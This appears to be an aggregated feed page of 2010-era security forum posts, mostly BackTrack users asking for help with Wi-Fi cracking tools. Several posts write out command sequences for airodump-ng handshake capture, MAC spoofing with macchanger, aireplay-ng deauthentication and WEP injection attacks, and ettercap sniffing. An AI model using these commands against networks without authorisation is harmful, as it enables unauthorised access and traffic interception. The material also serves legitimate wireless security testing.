1. Win7/WinXP wpa supplicant ignore AP key renewal timeout and never perform rekeying
2. It pertain to WM6.0/6.1 with HP iPAQ614C anf HTC Touch viva T2223 smartphones
3. Linux wpa supplicants perform key renewal according AP settings.
-
5:51
»
remote-exploit & backtrack
Victim:
Model: HP 6310b
CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
Memory: 4GB
OS: Windows 7
Wireless Interface: Intel(R) WiFi Link 5100 AGN
WiFi security:WPA2/WPA-Enterprise with EAP-TLS(Smartcard or certificate) authentication, TKIP encryption
MAC address: 00:1E:65:F8:BA:A8
Attacker:
Model: Dell Optiplex GX270
CPU: Intel Pentium 4 2.60 GHz
Memory: 1GB
OS: BT4F
Wireless Card: Alfa AWUS360H with 7dB omnidirectional antenna
AP:
Model: Linksys WRT54GL v1.1
Firmware: v4.30.11, Aug. 17, 2007
Wireless security and settings: WPA2-Enterprise, AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
BSSID: 00:18:39:D3:FB:A0
Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange
Run airodump-ng for WPA:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR
BSSID STATION PWR Rate Lost Packets Probes
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
^C
root@bt:~#
Run airodump-ng for WPA2:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:24:8C:57:8F:D3 -68 0 - 2 0 8
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
00:1F:33:FF:39:52 00:18:39:D3:FB:A0 -36 1e- 1 0 8
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
^C
Change attacker's MAC address:
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
root@bt:~# ifconfig wlan0 up
(To be Continued)
-
-
15:19
»
remote-exploit & backtrack
I recently installed BackTrack 4 on my macbook pro. While the installation for backtrack completed successfully, the mac side had an error. When partitioning the hard drive, I made the BackTrack 4 the root and left the mac side of the hard drive to the default that it had been set at. After installing BackTrack the mac side of the computer was not seen. When looking at the partition in BackTrack I saw that the mac side was not recognizable. I do not think the partition was wiped clean, but at the same time, I have no idea how to get it back and running. Any help is greatly appreciated!
-
-
10:06
»
remote-exploit & backtrack
Hi bt users
I am doing an experiment in which i am trying to get an energy saving protocol in 802.11 MAC layer
i am using orinocco cards in ad-hoc mode and 2 computers with ubuntu 8.10
i am planning to switch over to bt4 as i need to dump the packets and then analyse them for throughput etc..
i am using tcpdump/wireshark for this
next stage i am going to fix the power of both the cards and vary the distances and analyse the loss in packets..
can someone recommend me utilities specifically in bt4
lastly i am planning to make one node as master and inject the protocol using some utility..please recommend me utilities to achieve my experiment..
thanx in advance
-
-
17:00
»
Packet Storm Security Recent Files
ARP Sniff (Sniffer Lite) is a tiny ARP sniffer. This tool will be useful to analyze the ARP packets in the network. The tool gives out two types of information, the 14 byte Ethernet header and 28 byte ARP header. The tool requires G++ compiler and a libpcap package. Three arguments are coded as of now. One is to list the available devices, second is to sniff the default device and third is to sniff the device given as argument. The sniffer outputs the Ethernet header (Source MAC address, Destination MAC address and Ethernet type), ARP Header (Hardware type, Protocol type, Hardware address length, Protocol address length, Opcode, Source Hardware address and Protocol address, Destination hardware address and Protocol address).
-
17:00
»
Packet Storm Security Exploits
ARP Sniff (Sniffer Lite) is a tiny ARP sniffer. This tool will be useful to analyze the ARP packets in the network. The tool gives out two types of information, the 14 byte Ethernet header and 28 byte ARP header. The tool requires G++ compiler and a libpcap package. Three arguments are coded as of now. One is to list the available devices, second is to sniff the default device and third is to sniff the device given as argument. The sniffer outputs the Ethernet header (Source MAC address, Destination MAC address and Ethernet type), ARP Header (Hardware type, Protocol type, Hardware address length, Protocol address length, Opcode, Source Hardware address and Protocol address, Destination hardware address and Protocol address).
-
-
10:33
»
Hack a Day
[Jake Howe] brought his 1984 Mac up-to-date by cramming new guts inside of the classic case. The goal from the start was to run OS X Snow Leopard on the machine without altering the externals. He heated and formed acrylic around the original CRT screen to make a bezel for the replacement LCD screen. The [...]
-
-
13:07
»
remote-exploit & backtrack
Problem with station mac because it withdraws five with six why in one bssid
-
10:03
»
remote-exploit & backtrack
salut,
est ce que on peut cracker un clé wep lorsque le routeur cible utilise un filtrage d'adresse MAC .
merci d'avance .
-
-
16:57
»
remote-exploit & backtrack
How do I retrieve the client MAC from my cap file?
I'm using "airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w output-home mon0" to filter by the AP I'm monitoring.
Apparently a client connected, because I see that I have collected 75 IVs, but I didn't see the client MAC (I'm assuming it refreshed out, or whatever) by the time I saw the data numbers. So, I'm hoping to get the client MAC from the cap file.
Feel free to point me to a related post, but I didn't find one via search.
Thanks!
-
10:57
»
remote-exploit & backtrack
hi all
i have a little question!
we've setup a AP with wep shared key and i consumed that a hacker may have my wep !!
so we decided to limit the MAC address of the wireless cards !
is there any way that someone can fake this MACs or bypass this limitation anyway?
i read that if this limitation presents! with a tcpdump command it is possible to notice
this by getting deauth result, so i want to know can this limitation protect my AP?!
-
-
9:11
»
remote-exploit & backtrack
provato a recuperare la key in modo senza cliente ( dati non sono reali ma precisi nei vari comandi)
airodump-ng -c 11 -b 00:1A:C1:15:BE:34 -w cap mon0
CH 11 ][ Elapsed: 3 mins ][ 2010-02-26 13:34
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:1A:C1:15:BE:34 -74 100 1986 0 0 11 54 . WEP WEP OPN 3
BSSID STATION PWR Rate Lost Packets Probes
fin qua tutto ok nessun clinte attacco chopchop
aireplay-ng -1 0 -a 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0 comando per associare
13:31:11 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
13:31:11 Sending Authentication Request (Open System) [ACK]
13:31:11 Authentication successful
13:31:11 Sending Association Request [ACK]
13:31:11 Association successful :-) (AID: 1)
fin qua tutto ok almeno secondo il mio parere.
aireplay-ng -4 -b 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
13:31:29 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
^Cad 1502 packets...
Qui penso che ci sia un problema non avrebbe dovuto crearmi un finestra differente e poi confermare con Y invece e partita senza domandarmi niente e girare cosi all'infinito ?
avrebbe dovuto risponder cosi :
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
-
-
7:04
»
remote-exploit & backtrack
hi all
i tried to crack a friends WEP encrypted AP with airocrack-ng (command line , if any GUI exist plz let me know)
i use this command :
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
sudo aireplay-ng -1 0 -e Torkanet -a 00:00:00:00:00:00 -h00:00:00:00:00:00 wlan0
(MAC addresses is diffrent but Ap is Torkanet :D & it is on channel 5)
this is when no clients present!
and this commands when we use a clients :
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -0 10 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
the problem is when aircrack-ng gots packegs it said ".....still nothing tring another package" it done this over and over and over till i ran low on physical memory :D!! what should i do?
is our network secured enough?
and other silly question is :D on this command :
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
which MAC address is mine and which is for Ap? (the same question goes for -3 option!!)
by the way sry for my weak english!!:D
-
-
12:00
»
Hack a Day
[Robert] wrote a program using Max/MSP that lets him make music with his guitar hero controller. There’s another video after the break where he walks through the various features but here’s the gist of it. This works on Mac and Windows and allows a sort of ‘live play’ or midi mapping mode. In the midi [...]
-
-
18:13
»
remote-exploit & backtrack
Okay, so i've been searching for about 2 days and can't find a solution... It's getting frustrating. The things I have found aren't very user friendly in explanation or seem to be really out dated. I have a MacBook Pro running BT4 Final and can't get the right click working. Have tried messing with the xorg.conf file and just can't seem to get it exactly. Any help or links to some place that would explain it in the least confusing fashion would be awesome. :) Thanks in advance for any help.
-
-
14:51
»
remote-exploit & backtrack
I am having a little problem with capturing my WPA Handshake NOTE: This is for MY Home network. I have even tried turning the connected computer off and unplugging it from the router also turning the router off and back on NOTHING Works I simply can not capture MY Handshake I attend college as a Network Admin where I captured My schools handshake but I believe this is because there are always lots of people connected to the network i cant remember if i even had to deauth a computer although now i think of it I believe I did as well as spoofed my mac NOTE: I am not spoofing my MAC for my home network. can someone please help
-
-
0:00
»
remote-exploit & backtrack
Ok,.. So I got a pickle here and wanted to know if anyone ran into this,..
Went with verizon fios and they have there own routers cause I am amusing fiber optics? For giggles I tried to crack the new router at my house and it won't let me inject into it.. Works fine for my linksys one but for some reason there router seems to be a something new. There is something also new, you know it tells you the speed of the connection? like 54(Mps)? Well it says 54e.
Wait did some research,.. is this a case if mac address filtering? if so how do I adapt?
Also does that e mean that there is in fact mac address filtering going on?
-
-
8:33
»
remote-exploit & backtrack
slt
Je voudrait savoir que vous penser de mon niveau de sécurité wifi de ma freebox.
j'utilise une cle wifi WPA (TKIP + AES) 63 caractères générer en aléatoire.
De plus j'ai activer le router et j'ai autorise un DHCP de 12 adresse utilise par tout mes appareille wifi.
Et pour chacune des adresses IP j'ai réserver une adresse MAC de chacun de mes appareille.
Donc aucune adresse IP n'est disponible en adresse MAC inconnu.
Penser que c'est possible de cracker mon réseau sans connaitre mes adresses mac? Ces adresse mac peuvent elle être trouver a distance?
Merci
-
8:20
»
remote-exploit & backtrack
slt
Je voudrait savoir que vous penser de mon niveau de sécurité wifi de ma freebox.
j'utilise une cle wifi WPA (TKIP + AES) 63 caractères générer en aléatoire.
De plus j'ai activer le router et j'ai autorise un DHCP de 12 adresse utilise par tout mes appareille wifi.
Et pour chacune des adresses IP j'ai réserver une adresse MAC de chacun de mes appareille.
Donc aucune adresse IP n'est disponible en adresse MAC inconnu.
Penser que c'est possible de cracker mon réseau sans connaitre mes adresses mac? Ces adresse mac peuvent elle être trouver a distance?
Merci
-
-
23:59
»
remote-exploit & backtrack
Dear back|track users,
I have been experiencing a problem:
Previous search terms -
Searched google and BT for terms along the lines of:
mac spoof(ing) aireplay fake auth(entication) deauthentication packet
and any combination of those, but have not found a definitive answer that addresses the difficulty I'm experiencing.
Platform -
back|track4 pre-final live USB
card1: intel 5100 (bleeding edge driver from dec 2009)
card2: alfa AWUS036H (native rtl8187 drivers from BT4-prefinal)
target AP: Personal D-link router WBR-1310 (10 ft away)
NO MAC filtering set on target AP, WEP enabled
Description of problem:
Boot up BT4
airmon-ng start wlan0 (for alfa)
airodump-ng -c 1 mon0 (to fix the channel at 1)
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==> Fake auth success
change mac:
original mac: XX:XX:XX:XX:XX:BA
new mac : XX:XX:XX:XX:XX:BB (or any other change)
ifconfig wlan0 down; ifconfig mon0 down;
macchanger -m XX:XX:XX:XX:XX:BB wlan0
macchanger -m XX:XX:XX:XX:XX:BB mon0
ifconfig mon0 up;
airodump-ng -c 1 mon0
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==>
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Got a deauthentication packet! (Waiting 3 seconds)
.
.
.
Got a deauthentication packet! (Waiting 5 seconds)
.
.
. etc.
This happens for both Intel 5100 and Alfa AWUS036H
When I attempt an attack on my office router (with permission, namely by me), the mac spoofing doesn't seem to result in dauthentication from router.
What can be done:
1) Injection test, aireplay-ng --test mon0, will result in successful injection on both spoofed mac and original mac
2) With original mac, most attacks on d-link are successful as per tutorials on this page and other sources, including attacks 2,3,4, and subsequent aircracks and dictionary/table attacks. Once connected and ARP poisoned, many other attacks also work as usual.
QUESTION:
+How can the router possibly know what my original mac address is? (Again, NO MAC filters on routers)
+Why does it allow fake auth if I use original mac, but denies authentication when I use other macs (both completely random, or pseudo random spoofing like changing the last digit) ?
+Is there a work around?
Thank you for taking time to read my question, I appreciate any questions regarding my setup or comments on how I can approach the problem.
C.
-
14:24
»
remote-exploit & backtrack
As the title stated, I am trying to find some facts about
WHICH USB Wifi N-Draft that is known to work with Backtrack installed on VMWare Fusion.
The USB N-Draft that I am looking are the ones that supports
BOTH 2.4Ghz and 5Ghz.
If someone has used a particular USB N-Draft Wifi for the above, could you share the brand, model and where you buy it?
Thanks!
-
-
4:33
»
SecDocs
Authors:
Fabian Yamaguchi Tags:
exploiting client side Event:
Chaos Communication Congress 26th (26C3) 2009 Abstract: We will be presenting a number of previously undisclosed network-related design errors, ranging from data-link-layer bugs in Ethernet-drivers across issues in TCP/IP stacks all the way up to communication infrastructure components on layer 5. Our focus is on subtle mistakes, which do not fall into the memory-corruption category and yet in combination provide an attacker with a powerful bag of tricks. Built around a fictional average company network, we will tell the story of an attack making use of subtle bugs across the layers all of which are as of yet undisclosed. This will include a bug in an Ethernet-driver, which allows an attacker to bypass MAC- and IP-based filters, bugs in TCP-implementations that are assumed to be fixed but aren't, a web-cache which confuses itself and an instant-messenger, which was fooled by the protocol specification. All of these bugs share a common property: They are a consequence of insecure design and not of insecure coding-practices.
-
4:33
»
SecDocs
Authors:
Fabian Yamaguchi Tags:
exploiting client side Event:
Chaos Communication Congress 26th (26C3) 2009 Abstract: We will be presenting a number of previously undisclosed network-related design errors, ranging from data-link-layer bugs in Ethernet-drivers across issues in TCP/IP stacks all the way up to communication infrastructure components on layer 5. Our focus is on subtle mistakes, which do not fall into the memory-corruption category and yet in combination provide an attacker with a powerful bag of tricks. Built around a fictional average company network, we will tell the story of an attack making use of subtle bugs across the layers all of which are as of yet undisclosed. This will include a bug in an Ethernet-driver, which allows an attacker to bypass MAC- and IP-based filters, bugs in TCP-implementations that are assumed to be fixed but aren't, a web-cache which confuses itself and an instant-messenger, which was fooled by the protocol specification. All of these bugs share a common property: They are a consequence of insecure design and not of insecure coding-practices.
-
-
9:18
»
remote-exploit & backtrack
I read the man pages of ettercap and it said the target can be in form of
MAC/IP/PORTS
Ok...
to all my dear darklords ...I have 2 basic questions..which , I request some help to :
<> I specify mac addresses /MAC/ /MAC2/ it says Invalid IP range. So how do you specify them or that's not allowed.
<>More imp one : I would like to SNIFF NOT ALL BUT JUST PACKETS OF PORTS # 80 AND 443 FOR SPECIFIC IP RANGE.
I thought his would convey the information :
ettercap <options> /IP:port1,port2/ /IP2:Port1,port2/
but it does not like that format too.
Can someone please lemme know if that is poss and how .
MANY THANKS
S
-
-
6:01
»
remote-exploit & backtrack
How to connect to your phone via Bluetooth to access Internet
by:MWood
this is not 100% foolproof, but works for me.
My provider is DNA Finland, your chatscript line
may be different acording to your service description
Config your files:
/etc/bluetooth
-
edit
rfcomm.conf and
main.conf
/etc/bluetooth/rfcomm.conf
#
# RFCOMM configuration file.
#
rfcomm0 {
# # Automatically bind the device at startup
bind yes;
#
# # Bluetooth address of the device
device 00:26:CC:8A:24:59;
#
# # RFCOMM channel for the connection
channel 1;
#
# # Description of the connection
comment "Dial-Up Networking";
}
/etc/bluetooth/main.conf
[General]
# List of plugins that should not be loaded on bluetoothd startup
#DisablePlugins = network,input
# Default adaper name
# %h - substituted for hostname
# %d - substituted for adapter id
#Name = %h-%d
Name = YOUR_BOX
# Default device class. Only the major and minor device class bits are
# considered
#Class = 0x000100
Class = 0x0a010c
# run "hciconfig hci0 class"
# How long to stay in discoverable mode before going back to non-discoverable
# The value is in seconds. Default is 180, i.e. 3 minutes.
# 0 = disable timer, i.e. stay discoverable forever
DiscoverableTimeout = 0
# Use some other page timeout than the controller default one
# (16384 = 10 seconds)
PageTimeout = 8192
# Behaviour for Adapter.SetProperty("mode", "off")
# Possible values: "DevDown", "NoScan" (default)
OffMode = NoScan
# Discover scheduler interval used in Adapter.DiscoverDevices
# The value is in seconds. Defaults is 0 to use controller scheduler
DiscoverSchedulerInterval = 0
/etc/ppp/peers
-
create a file "BluetoothDialup"
/etc/ppp/peers/BluetoothDialup
debug
noauth
connect "/usr/sbin/chat -v -f /etc/chatscripts/BluetoothDialup"
usepeerdns
/dev/rfcomm0 115200
defaultroute
crtscts
lcp-echo-failure 0
/etc/chatscripts
-
create a file "BluetoothDialup" ( yes the same name as above )
/etc/chatscripts/BluetoothDialup
TIMEOUT 35
ECHO ON
ABORT '\nBUSY\r'
ABORT '\nERROR\r'
ABORT '\nNO ANSWER\r'
ABORT '\nNO CARRIER\r'
ABORT '\nNO DIALTONE\r'
ABORT '\nRINGING\r\n\r\nRINGING\r'
'' \rAT
OK 'AT+CGDCONT=1, "IP", "INTERNET"'
OK ATD*99#
CONNECT ""
note: the line
OK ATD*99# is your dialup number, mine is simply *99#
note: the line
OK 'AT+CGDCONT=1, "IP", "INTERNET"'
is very importaint, especially the "INTERNET" entry, this should
match your phones service. Mine is "dna INTERNET" on my phone, but
the correct info for the script is "INTERNET".
If you get an error about needed to subscribe to blahblah, you got it wrong!
/var/lib/YOUR_BT4_BLUETOOTHDEVICE_MAC/
-
create a file called "pincodes"
enter on one line...
YOUR_PHONES_MAC PIN
/var/lib/YOUR_BT4_BLUETOOTHDEVICE_MAC/pincodes
example:
00:11:22:33:44:55 1234
-
restart the bt daemon...
user@bt~#
/etc/init.d/bluetooth restart
to connect issue the command...
user@bt~#
pon BluetoothDialup
to disconnect issue the command....
user@bt~#
poff BluetoothDialup
problems:
If you have previously paired your phone in windows,
you may need to delete the old pairing,
then repair in BT4. Pairing will be from BT4->Phone
( accecpt request and PIN:1234 )
-
-
2:36
»
remote-exploit & backtrack
Hi,
I just got a simple question, that I could not answer, since I found the information anywhere...
Can an Ettercap filter be used for Layer 2 parameters? (MAC addresses)
I tried to create a filter using the parameters "eth.src and eth.dst" and etterfilter compiled it without problems. Anyway, once the filter is applied, it does not filter as desired...
thanks for the help!
best regards.
-
-
17:47
»
remote-exploit & backtrack
So I came across a 4 minute video on youtube on how to penetrate my own router. I have a Belkin router and I was able to do everything the fella in the video has done.
I use VMWare to run BT4. I type out everything he does but with my own info obviously. And this is what I see afterwards...
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 676863 packets (got 1 ARP requests and 19928 ACKs), sent 623247 packets...(499 pps)
I know nothing of what I am doing. It just looked easy and I happen to have a USB adapter. But whatever I am doing I had fun.
thanks
-
4:34
»
remote-exploit & backtrack
Buenas,
he instalado el BT4, porque necesito utilizar Ettercap para unos determinados tests de integridad en una red.
He probado varios filtros para alterar información IP y TCP y funcionan de lujo.
También quería alterar información de nivel dos (direcciones MAC, básicamente).
En el filtro defino varias condiciones dependientes de la MAC origen o MAC destino (eth.src o etc.dst). Me permite compilar el filtro y ejecutarlo, pero se salta las condiciones como le da la gana...
Alguien sabe a que puede ser debido?
gracias!
Hi everyone,
I have been looking throughout the forum and in Google, and have found nothing...that's why I post this new thread.
I am using ETTERCAP for testing some security and structural issues of a network.
I configured and compiled some filters for IP and HTTP traffic and worked with no problems.
The problems came when I tried to do Layer 2 (MAC address) filters. I did some filter conditions using
eth.src and
etc.dst, but it did not work. The filter compiled without problems, but the filter did not apply, even if the conditions were fulfilled (I made cross tests with sniffer and ethercap-filter messages).
Do I have to configure something special to make this filter work?
Thank you everyone for your help!
Hi,
I've looked in the documentation, but found nothing...
It is possible to introduce delays in the sent message using ettercap bridged sniffing?
thanks!
1337day (was: Inj3ct0r, 1337db)
OSVDB Vulnerabilities
Exploit-DB
SecurityFocus Vulnerabilities
Bugtraq
XSSed
Penetration Testing
BackTrack Linux Forums
Threatpost
carnal0wnage.attackresearch.com
Carnal0wnage
Darknet
The Exploitant
